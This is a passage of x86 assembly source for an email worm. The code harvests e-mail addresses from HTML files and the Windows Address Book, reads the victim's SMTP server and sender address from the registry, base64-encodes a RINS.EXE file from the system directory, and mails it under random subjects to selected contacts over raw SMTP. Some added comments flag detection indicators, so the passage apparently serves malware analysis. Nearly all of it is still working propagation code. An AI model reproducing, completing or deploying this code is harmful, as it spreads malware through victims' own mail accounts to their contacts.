inc edx
CopyChar:
stosb
jmp NextChar
SkipChar:
inc esi
jmp NextChar
EndChar:
xor al,al
stosb
pop edi
test edx,edx ; if EDX=0, mail is not
je SeekMailToStr ; valid (no '@')
cmp dword ptr [NbEmailFound], 0
je NoEmailYet
mov edi, [EmailCurrentPos]
mov eax, [edi]
sub edi, 64
cmp eax, [edi]
je SeekMailToStr
NoEmailYet:
inc dword ptr [NbEmailFound]
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
je CloseHtml_MapViewHandle ; YES...
jmp SeekMailToStr ; get next email address
;........................ Find Email in WAB ..................................
;.............................................................................
;.............. SearchWabFile_Email
; Collects e-mail addresses from the Windows Address Book (WAB) into the
; 64-byte slots at [EmailList] and sets [NbEmailFound] / [NbWabEmail].
; Flow: registry read of the WAB file name -> map the file -> copy at most
;       NbEmailWanted entries with StockWabEmail -> unmap.
; In:   nothing (global state only)
; Out:  nothing in registers; [NbEmailFound], [NbWabEmail], [EmailList] written
; Clobbers: eax, ecx, esi, edi, flags (nothing is preserved)
; Observable behaviour (detection): SHGetValueA on
;   HKCU\Software\Microsoft\Wab\WAB4\Wab File Name followed by an open/map
;   of the file that key names.
SearchWabFile_Email:
call Clear_TempPath&Name ; presumably zeroes TempPath&Name before it receives the path - not visible here
GetWabPath:
mov dword ptr[KeySize], 260 ; in/out buffer size for SHGetValueA (MAX_PATH)
push offset KeySize ; pcbData
push offset TempPath&Name ; pvData: receives the WAB file path
push offset Reg ; pdwType
push 0 ; pszValue = NULL -> the key's default value
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; pszSubKey
push 80000001h ; hkey = HKEY_CURRENT_USER
api _SHGetValueA
test eax, eax ; 0 = ERROR_SUCCESS
jne EndWab ; no WAB registered for this user: nothing to harvest
Open&Map_WabFile:
call Open&MapFile ; CF=1 on failure; on success eax is used below as the mapped view base
jc EndWab
WabSearchEmail:
mov ecx, [eax+64h] ; entry count read from the mapped file header
jecxz WabUnmapView ; empty address book
mov dword ptr[NbEmailFound], ecx ; the HTML search treats these as already found
mov [NbWabEmail],ecx ; consumed by SelectEmail
TruncFriend:
cmp ecx, NbEmailWanted ; more entries than the list holds ?
jbe NotManyFriend ; unsigned compare on a count
mov ecx, NbEmailWanted ; cap the copy count
dec ecx ; leave room for one: the HTML search does inc [NbEmailFound] / cmp NbEmailWanted (see comment above)
mov dword ptr[NbEmailFound], ecx
mov [NbWabEmail],ecx
NotManyFriend:
mov esi, [eax+60h] ; file offset of the entry array
add esi, eax ; -> absolute pointer inside the mapped view
mov edi, dword ptr[EmailList] ; destination list (64-byte slots)
GetWabEmailLoop:
call StockWabEmail ; copy one entry; advances esi (source) and edi (dest slot)
dec ecx
jnz GetWabEmailLoop
WabUnmapView:
call Open&MapFileUnmapView ; release the view
EndWab:
ret
;.............. StockWabEmail
; Copies one WAB entry into a 40h-byte destination slot, converting UTF-16
; entries to one byte per character (low byte only) and copying ANSI entries
; as-is.  The entry is assumed UTF-16 when its second byte is 0.
; In:   esi -> WAB entry, edi -> destination slot
; Out:  edi advanced to the next 40h-byte slot
;       esi advanced to the next entry: +44h for UTF-16 entries, +24h for ANSI
;       ecx preserved
; Clobbers: eax (al), flags; DF assumed clear for lodsw/stosb/movsb
; Note: the copy stops at the terminating 0 byte; the slot counter in ecx
;       is the only length bound.
StockWabEmail:
push ecx esi ; caller's loop counter and entry pointer
push 40h
pop ecx ; ecx = 64 = bytes remaining in the destination slot
cmp byte ptr [esi+1],0 ; second byte 0 -> treat as UTF-16
jne StockWabEmailLoop
StockWabEmailUnicodeLoop:
lodsw ; ax = one UTF-16 code unit
stosb ; store its low byte only
dec ecx
test al, al ; terminator copied ?
jne StockWabEmailUnicodeLoop
add edi, ecx ; skip the unused rest of the slot
pop esi ecx
add esi, 44h ; stride of a UTF-16 entry in the WAB file
ret
StockWabEmailLoop:
movsb ; one ANSI byte
dec ecx
test al, al ; al still holds the byte tested above, not the byte just copied
jne StockWabEmailLoop
add edi, ecx ; skip the unused rest of the slot
pop esi ecx
add esi, 24h ; stride of an ANSI entry in the WAB file
ret
;.......................... Send Email SMTP ..................................
;.............................................................................
;.............. SendEmail
; Top-level send loop: resolves the user's SMTP server, prepares the
; sender address / attachment, then NbToSend times picks an address,
; copies it into CurrentEmail, builds the message header and runs one
; SMTP session (connect, commands, disconnect).
; In:   nothing (global state only)
; Out:  nothing; ebx is used as the loop counter and is not preserved
; Clobbers: eax, ebx, ecx, edx, esi, edi, flags (plus callees)
; Observable behaviour (detection): repeated outbound TCP/25 connections
;   to the SMTP host read from the registry (see SmtpConnection).
SendEmail:
call GetUserSmtpServer ; CF=1 if the registry holds no default SMTP account
jc SendError
call AttachementSendInit ; sender address, file path, base64 of the file
mov ebx, NbToSend ; messages per run
SendRandomEmailLoop:
call SelectEmail ; esi -> chosen address, ecx = 0 if none usable
jecxz SendError ; list empty or every candidate rejected
lea edi, CurrentEmail
mov ecx, EmailSize
rep movsb ; CurrentEmail = EmailSize bytes from the selected slot (DF assumed clear)
NormalSend:
call BuildMessageHeader ; From/To/Subject + MIME prefix into [MemMessageBody1]
call SmtpConnection ; CF=1 on socket or greeting failure
jc SendNext
call SmtpSendCommand ; CF=1 on a rejected command
jc SendNext
call SmtpDisConnection ; closesocket + WSACleanup
SendNext:
call ClearHeaderMem ; zero the header buffer for the next message
dec ebx
jnz SendRandomEmailLoop
SendError:
ret
;.............. Select Email to Send
; OUT: esi points to the selected email
; ecx = 0 on error
; entries from the *.WAB are selected first
;.............. SelectEmail
; Picks one address from the 64-byte slots at [EmailList].  While
; [NbWabEmail] is non-zero the WAB entries are consumed from the highest
; index downwards; afterwards a random index below NbEmailWanted is tried.
; At most NbEmailWanted attempts.  A slot is rejected when its first dword
; is 0, or when its first four bytes (case-folded) are "webm" or "http".
; In:   nothing (global state only)
; Out:  esi -> selected address and ecx != 0 on success
;       ecx = 0 when every attempt was rejected (esi undefined)
; Clobbers: eax, ecx, edx, esi, edi, flags; decrements [NbWabEmail]
SelectEmail:
mov ecx, NbEmailWanted ; attempt budget
inc ecx ; the loop head decrements before testing
SelectIT:
dec ecx
jz SelectEmailError ; budget exhausted -> ecx = 0
mov esi, dword ptr [EmailList] ; base of the in-memory list
mov edi, NbEmailWanted ; range for GetRndNumber
call GetRndNumber ; edx = random number (per the original comment)
cmp dword ptr[NbWabEmail], 0
je TriEMails ; no WAB entries left: keep the random index
dec dword ptr[NbWabEmail] ; consume one WAB entry
mov edx, dword ptr[NbWabEmail] ; and use its index instead
TriEMails:
rol edx, 6 ; index * 64 (slot size); correct while edx < 2^26
add esi, edx ; esi -> slot
mov eax, dword ptr [esi]
test eax, eax ; empty slot ?
je SelectIT
mov eax, dword ptr [esi]
or eax, 20202020h ; fold the first four bytes to lower case (ASCII letters)
cmp eax, 'mbew' ; little-endian "webm": skip webmaster@... addresses
je SelectIT
mov eax, dword ptr [esi]
or eax, 20202020h
cmp eax, 'ptth' ; little-endian "http": skip URLs picked up from HTML
je SelectIT
SelectEmailError:
ret
;.............. Init The Attachment File
; Init of the message: header + body
;.............. AttachementSendInit
; One-time preparation before the send loop:
;   1. allocate the header buffer (ResMemHeader)
;   2. read the sender address ("SMTP Email Address" under AccountKey) into mailfrom
;   3. build MyPath = <system directory>\RINS.EXE
;   4. base64-encode that file into memory (CodeB64File)
; In:   nothing (global state only)
; Out:  nothing; mailfrom, MyPath and [MemMessageBody1] written
; Clobbers: eax, ecx, edi, flags (plus callees); DF assumed clear for rep stosb
; Observable behaviour (detection): the registry read of the sender address
;   and a read of RINS.EXE from the system directory.
AttachementSendInit:
InitWhoSendName:
call ResMemHeader ; VirtualAlloc MimeHeaderSize -> [MemMessageBody1]
mov dword ptr[KeySize], 00000040h ; buffer size for mailfrom (64 bytes)
push offset KeySize ; pcbData
push offset mailfrom ; pvData
push offset Reg ; pdwType
@pushsz "SMTP Email Address" ; pszValue
lea eax, AccountKey
push eax ; pszSubKey: presumably built from the account found by GetUserSmtpServer - not visible here
push 80000001h ; HKEY_CURRENT_USER
api _SHGetValueA ; return value is not examined
InitWormName:
xor al,al
mov ecx,260
lea edi, MyPath
rep stosb ; zero MyPath (260 bytes)
push 260 ; uSize
push offset MyPath ; lpBuffer
api _GetSystemDirectoryA
@pushsz '\RINS.EXE' ; file name appended to the system directory
push offset MyPath
api _lstrcat ; MyPath = "<system dir>\RINS.EXE"
SmtpNormalSendInit:
call CodeB64File ; encodes the file at MyPath into memory (per the original comment)
ret
;.............. Build Message Header
;.............. BuildMessageHeader
; Appends the message head to the buffer at [MemMessageBody1] with lstrcat:
;   "From: " mailfrom CRLF
;   "To: " CurrentEmail CRLF
;   "Subject: " <random entry of RndSubjectTb> CRLF
;   MessageBody1 (the fixed MIME prefix)
; then stores the resulting length in [MessageSize1] for the send command.
; In:   mailfrom, CurrentEmail and [MemMessageBody1] already set up
; Out:  [MessageSize1] = lstrlen of the buffer; ebx preserved (caller's loop counter)
; Clobbers: eax, ecx, edx, esi, edi, flags (lstrcat/lstrlen are stdcall)
BuildMessageHeader:
push ebx ; SendEmail keeps its loop counter in ebx
BuildHeader:
mov esi, dword ptr[MemMessageBody1] ; esi = destination buffer for every lstrcat below
BuildFrom:
@pushsz 'From: '
push esi
api _lstrcat
push offset mailfrom ; sender address read from the registry
push esi
api _lstrcat
@pushsz CRLF
push esi
api _lstrcat
BuildTo:
@pushsz 'To: '
push esi
api _lstrcat
push offset CurrentEmail ; address selected by SelectEmail
push esi
api _lstrcat
@pushsz CRLF
push esi
api _lstrcat
BuildSubject:
@pushsz 'Subject: '
push esi
api _lstrcat
push NbSubject ; number of entries in RndSubjectTb
pop edi ; edi = range for GetRndNumber
call GetRndNumber ; edx = random number (per the original comment)
lea edi, RndSubjectTb
rol edx, 2 ; index * 4: table of dword pointers
add edi, edx ; edi -> chosen table entry
mov edi, [edi] ; edi = pointer to the subject string
push edi
push esi
api _lstrcat
@pushsz CRLF
push esi
api _lstrcat
BuildBody:
push offset MessageBody1 ; fixed MIME prefix up to the message text
push esi
api _lstrcat
BuildSizeBody1:
push esi
api _lstrlen
mov dword ptr[MessageSize1], eax ; header + MIME prefix length, used by the send command
BuildMessageHeaderError:
pop ebx
ret
;.............. Clear The Mem Of The Mime Header
;.............. ClearHeaderMem
; Zeroes the MimeHeaderSize-byte buffer at [MemMessageBody1] so the next
; BuildMessageHeader starts from an empty string.
; Clobbers: eax (al), ecx, edi, flags; DF assumed clear
ClearHeaderMem:
xor al,al ; fill byte
mov ecx, MimeHeaderSize ; byte count
mov edi, dword ptr[MemMessageBody1] ; buffer allocated by ResMemHeader
rep stosb
ret
;.............. Some Mem For The Mime Header
;.............. ResMemHeader
; VirtualAlloc(NULL, MimeHeaderSize, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE)
; and stores the result in [MemMessageBody1] as returned (no NULL check here).
; Clobbers: eax, ecx, edx, flags
ResMemHeader:
xor eax,eax
push PAGE_READWRITE ; flProtect
push MEM_RESERVE or MEM_COMMIT ; flAllocationType
push MimeHeaderSize ; dwSize
push eax ; lpAddress = NULL, let the system choose
api _VirtualAlloc
mov dword ptr[MemMessageBody1], eax ; buffer base (or 0 on failure)
ret
;........................... Send via SMTP ...................................
;.............................................................................
; 4 Parts:
; - GetLocalSmtpServeur: Find default SMTP server
; - SmtpConnection: Init Socket + Connect to SMTP host
; - SmtpSendCommand: Send all the commands
; - SmtpDisConnection: Clean + Disconnect
;.............. Get User Server
;.............. GetUserSmtpServer
; Reads the user's default mail account and its SMTP server from the
; registry (HKEY_CURRENT_USER = 80000001h):
;   "Software\Microsoft\Internet Account Manager" / "Default Mail Account" -> AccountSubKey
;   AccountKey / "SMTP Server" -> SmtpServeur
; Out:  CF=0 both values read; CF=1 if either SHGetValueA fails
; Clobbers: eax, ecx, edx, flags; [KeySize] rewritten
; Observable behaviour (detection): these two registry reads by a process
;   that is not the user's mail client.
GetUserSmtpServer:
GetUserInternetAccount:
mov dword ptr[KeySize], 00000040h ; buffer size (64 bytes)
push offset KeySize ; pcbData
push offset AccountSubKey ; pvData
push offset Reg ; pdwType
@pushsz "Default Mail Account" ; pszValue
@pushsz "Software\Microsoft\Internet Account Manager" ; pszSubKey
push 80000001h ; HKEY_CURRENT_USER
api _SHGetValueA
test eax, eax ; 0 = ERROR_SUCCESS
jne GetUserSmtpServerError
GetUserInternetServer:
mov dword ptr[KeySize], 00000040h ; buffer size (64 bytes)
push offset KeySize ; pcbData
push offset SmtpServeur ; pvData
push offset Reg ; pdwType
@pushsz "SMTP Server" ; pszValue
lea eax, AccountKey
push eax ; pszSubKey: presumably combines the path with AccountSubKey - not visible here
push 80000001h ; HKEY_CURRENT_USER
api _SHGetValueA
test eax, eax ; 0 = ERROR_SUCCESS
jne GetUserSmtpServerError
clc ; success
ret
GetUserSmtpServerError:
stc ; failure
ret
;.............. Smtp Connection
;.............. SmtpConnection
; Opens a TCP connection to SmtpServeur:25 and waits for the server greeting:
;   WSAStartup(1.1) -> socket(AF_INET, SOCK_STREAM, 0) -> htons(25) ->
;   gethostbyname(SmtpServeur) -> connect -> GetServeurReply
; Out:  CF=0 connected, [hSocket] valid, all registers preserved (pushad/popad)
;       CF=1 on failure; the failing step jumps into the matching clean-up
;       tail inside SmtpDisConnection (WSA_Error / Socket_Error /
;       Error_CloseSocket&CleanUp), which does popad and stc.
; Observable behaviour (detection): a DNS lookup of the configured SMTP host
;   and an outbound TCP/25 connection from this process.
SmtpConnection:
pushad ; balanced by the popad in this routine or in the SmtpDisConnection tails
push offset WSAData ; lpWSAData
push 101h ; wVersionRequested = 1.1
api _WSAStartup
test eax,eax ; 0 = success
jne WSA_Error ; nothing to clean up: popad + stc
push 0 ; protocol = 0 (default for the type)
push 1 ; SOCK_STREAM
push 2 ; AF_INET
api _socket
inc eax ; INVALID_SOCKET (-1) becomes 0
je Socket_Error ; WSACleanup + stc
dec eax ; restore the handle
mov [hSocket],eax
push 25 ; SMTP port, host order
api _htons
mov word ptr[wsocket+2], ax ; sin_port; sin_family at [wsocket] is already AF_INET
push offset SmtpServeur ; host name from the registry
api _gethostbyname
test eax,eax ; NULL = lookup failed
je Error_CloseSocket&CleanUp
mov eax,[eax+10h] ; presumably reaches the first address pointer of the HOSTENT - field offset not verified here
mov eax,[eax] ; IPv4 address, network order
mov [ServeurIP],eax ; sin_addr (ServeurIP presumably lies inside wsocket - not visible here)
push 010h ; sizeof(sockaddr_in)
push offset wsocket ; name
push [hSocket] ; s
api _connect
inc eax ; SOCKET_ERROR (-1) becomes 0
je Error_CloseSocket&CleanUp
call GetServeurReply ; CF=1 unless the greeting is one of the accepted codes
jc Error_CloseSocket&CleanUp
popad
clc ; connected
ret
;.............. GetServeurReply
; Reads one SMTP reply line from [hSocket]: the first 4 bytes go to
; ServeurReply, the rest is consumed one byte at a time into
; ServeurReplyEnd until a line feed (0Ah) arrives.
; Out:  CF=0 when the 4-byte code is "220 ", "250 ", "251 " or "354 "
;       (the literals below are those strings in little-endian order)
;       CF=1 on a short first read or any other code
; Clobbers: eax, ebx, ecx, edx, flags (ebx is NOT saved; callers sit inside a pushad)
GetServeurReply:
push 0 ; flags
push 4 ; len: the 3-digit code plus the following space
push offset ServeurReply ; buf
push [hSocket] ; s
api _recv
cmp eax, 4 ; exactly 4 bytes received ?
jne ReplyError
ServeurReplyLoop:
mov ebx, offset ServeurReplyEnd ; one-byte scratch buffer
push 0 ; flags
push 1 ; len
push ebx ; buf
push [hSocket] ; s
api _recv
jne ReplyError
cmp byte ptr [ebx], 0Ah ; end of line ?
jne ServeurReplyLoop ; drain the rest of the line
mov eax, [ServeurReply]
cmp eax, ' 022' ; "220 " service ready
je ReplyOk
cmp eax, ' 052' ; "250 " requested action OK
je ReplyOk
cmp eax, ' 152' ; "251 " user not local, will forward
je ReplyOk
cmp eax, ' 453' ; "354 " start mail input
jne ReplyError
ReplyOk:
clc
ret
ReplyError:
stc
ret
;.............. Smtp DisConnection
;.............. SmtpDisConnection
; closesocket([hSocket]) + WSACleanup, then restores registers and sets CF.
; The three inner labels are the shared error tails of SmtpConnection and
; SmtpSendCommand, entered with their pushad frame still on the stack:
;   Error_CloseSocket&CleanUp - close the socket, then clean up
;   Socket_Error              - WSACleanup only (socket was never created)
;   WSA_Error                 - popad + stc only (WSAStartup failed)
; Out:  CF=1 always, including the normal call from SendEmail (which ignores it)
; Clobbers: none visible to the caller (popad)
SmtpDisConnection:
pushad
Error_CloseSocket&CleanUp:
push dword ptr [hSocket]
api _closesocket
Socket_Error:
api _WSACleanup
WSA_Error:
popad
stc
ret
;.............. Smtp Send
SmtpSendCommand:
pushad
SendHelloCmd:
mov esi,offset cmd_helo ; 'HELO xxx',CRLF
push 14 ; cmd size
pop ecx ; cmd size
call SendSocket ; send HELO command
call GetServeurReply ; Ok ?
jc Error_CloseSocket&CleanUp ; No
SendMailFromCmd:
mov esi,offset cmd_mailfrom ; 'MAIL FROM:<'
push 11 ; cmd size
pop ecx ; size
call SendSocket ; send MAIL FROM command
mov esi,offset mailfrom ; ptr default user email
push esi
api _lstrlen
xchg ecx, eax
call SendSocket ; 2